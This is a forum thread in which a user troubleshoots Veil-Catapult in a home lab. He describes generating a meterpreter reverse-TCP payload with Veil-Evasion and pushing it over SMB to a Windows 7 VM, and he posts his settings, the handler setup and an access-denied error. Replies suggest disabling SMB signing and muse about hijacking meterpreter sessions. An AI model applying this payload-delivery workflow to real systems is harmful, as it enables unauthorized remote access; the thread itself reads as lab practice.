
Veil-Catapult : EXE transfer


kikimonste


Hi,

I'm new to the hak5 forums.

I've been having an issue with Veil-Catapult; it never seems to work.

Here is what I've done:

Bridged 2 VMs:

One running Kali Linux, IP: 192.168.0.101,

One running good old Win7 SP1, IP: 192.168.0.102.

Then, start a terminal, generate a payload with veil-evasion using c/meterpreter/rev_tcp,

feed Veil-Catapult my payload in EXE delivery mode:

Veil-Catapult

EXE DELIVERY

Enter path to payload : /usr/share/veil-evasion/compiled/load.exe [enter]

Enter target IP : 192.168.0.102 [enter]

Enter target [domain/]username : M-101100 [enter]

Enter target password : 00000 [enter]

Press Enter to lauch : [enter]

Error : Timeout : bad credential.

Exe Delivered Sucessfuly.

Right before that, I set up msfconsole with multi/handler using port 4444, listening on ANY (0.0.0.0:4444).

Settings in veil-evasion for payload generation were: LPORT: 4444, LHOST: 192.168.0.101

Now, did anyone get this type of error?

If I did something wrong, how do I fix it?

Thanks a lot, guys.

Rick.

Link to comment

Here is the error.

Veil-Catapult: payload delivery system | [Version]: 1.1
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @veilframework
=========================================================================

Exception: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[!] Error on 192.168.89.113 with credentials target:00000

[*] Payload upload and triggering complete!

Link to comment

A quick Google search on that access denied error resulted in a post somewhere that says you should enter the registry of your attacking machine and find the key "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters". In there you should create the "RequireSecuritySignature" key as a REG_DWORD and set it to a value of 0.

I've never used any of this, so no guarantees on what it does or if it helps. The actual registry key is described by Microsoft here and I HIGHLY recommend you read it before you kill your machine and come back blaming me for it.

Link to comment

  • 4 weeks later...

> Right before that, I set up msfconsole with multi/handler using port 4444, listening on ANY (0.0.0.0:4444).
>
> Settings in veil-evasion for payload generation were: LPORT: 4444, LHOST: 192.168.0.101

Running services on port 4444 is going to be a dead giveaway you are a hacker. Just sayin'. If I was scanning the network and saw 4444 I would think Metasploit.

That brings up an interesting question. Is there a reliable way to hijack a Meterpreter session? Or maybe use ARP spoofing to make the target machine think you are the intruder machine and effectively MITM the session. It would sure save me a lot of work. Just intercept the attacker's commands. Nullify them. Issue your own commands.

Link to comment